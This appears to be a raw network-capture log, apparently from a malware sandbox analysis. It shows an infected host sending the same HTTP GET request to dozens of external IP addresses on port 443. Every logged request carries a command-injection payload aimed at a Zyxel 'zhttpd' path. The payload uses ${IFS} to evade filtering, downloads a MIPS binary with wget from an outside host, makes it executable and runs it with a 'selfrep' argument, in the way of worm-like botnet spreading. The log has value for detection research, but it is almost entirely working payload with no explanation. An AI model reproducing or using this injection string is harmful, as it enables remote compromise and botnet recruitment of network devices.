                                      Jan 19, 2024 17:29:40.942347050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6455192.168.2.143784441.14.167.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.942385912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6456192.168.2.1449258110.13.60.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.942436934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6457192.168.2.1434756136.89.203.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.942475080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6458192.168.2.143307676.232.200.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.942521095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6459192.168.2.1442062198.76.22.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.942553043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6460192.168.2.1455216220.44.168.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.942591906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6461192.168.2.1441516146.91.229.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.942640066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6462192.168.2.144701417.140.143.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.942667961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6463192.168.2.1445288196.80.189.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.942706108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6464192.168.2.143823273.149.224.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.942775965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6465192.168.2.1456838179.187.139.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.942806005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6466192.168.2.1449952194.104.157.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.942838907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6467192.168.2.1453628191.186.230.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.942871094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6468192.168.2.143468674.78.5.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.942934036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6469192.168.2.1448172188.73.155.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.942955017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6470192.168.2.1446758153.77.29.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.942995071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6471192.168.2.1435738207.19.227.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.943031073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6472192.168.2.1459168154.132.128.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.943064928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6473192.168.2.1450444100.24.109.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.943139076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6474192.168.2.1457014175.122.171.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.943176031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6475192.168.2.1434656219.2.12.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.943217993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6476192.168.2.143339287.233.49.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.943253994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6477192.168.2.1448292126.109.28.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.943304062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6478192.168.2.1440412149.202.250.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.943344116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6479192.168.2.143902075.161.146.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.943375111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6480192.168.2.1450328131.219.218.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.943418980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6481192.168.2.1450274204.221.95.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.943506002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6482192.168.2.1455414168.76.135.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.943526983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6483192.168.2.1454214154.109.7.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.943566084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6484192.168.2.145193025.60.249.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.943597078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6485192.168.2.144011648.185.238.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.943634987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6486192.168.2.145438876.62.250.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.943703890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6487192.168.2.1445608119.149.239.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.943723917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6488192.168.2.1448538222.118.47.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.943769932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6489192.168.2.1434414114.128.249.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.943794012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6490192.168.2.145446218.157.151.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.943850994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6491192.168.2.1438014104.215.157.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.943898916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6492192.168.2.1452902116.116.126.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.943898916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6493192.168.2.1439224174.113.125.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.943928957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6494192.168.2.143636612.214.237.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.943970919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6495192.168.2.1455218136.30.227.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.943978071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6496192.168.2.1460120209.209.103.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.944017887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6497192.168.2.1442954205.102.104.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.944041967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6498192.168.2.144799685.59.115.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.944070101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6499192.168.2.1442704141.230.187.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.944144964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6500192.168.2.1445960162.86.218.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.944180012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6501192.168.2.1449628189.250.43.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.944201946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6502192.168.2.145637661.102.123.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.944220066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6503192.168.2.144620277.58.242.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.944284916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6504192.168.2.1436482105.203.40.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.944315910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6505192.168.2.144135820.51.92.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.944353104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6506192.168.2.1444120180.220.206.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.944380045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6507192.168.2.145963649.110.36.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.944408894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6508192.168.2.1458262211.121.24.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.944458008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6509192.168.2.143553292.115.43.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.944513083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6510192.168.2.1443346119.34.241.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.944540024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6511192.168.2.144912664.176.20.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.944586039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6512192.168.2.1455190171.194.169.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.944591045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6513192.168.2.145310413.95.223.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.944633007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6514192.168.2.1434980119.111.176.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.944689989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6515192.168.2.1453440162.83.88.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.944724083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6516192.168.2.1433658137.146.101.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.944755077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6517192.168.2.145765638.4.47.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.944788933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6518192.168.2.143392866.71.230.59443
                                      TimestampBytes transferredDirectionData
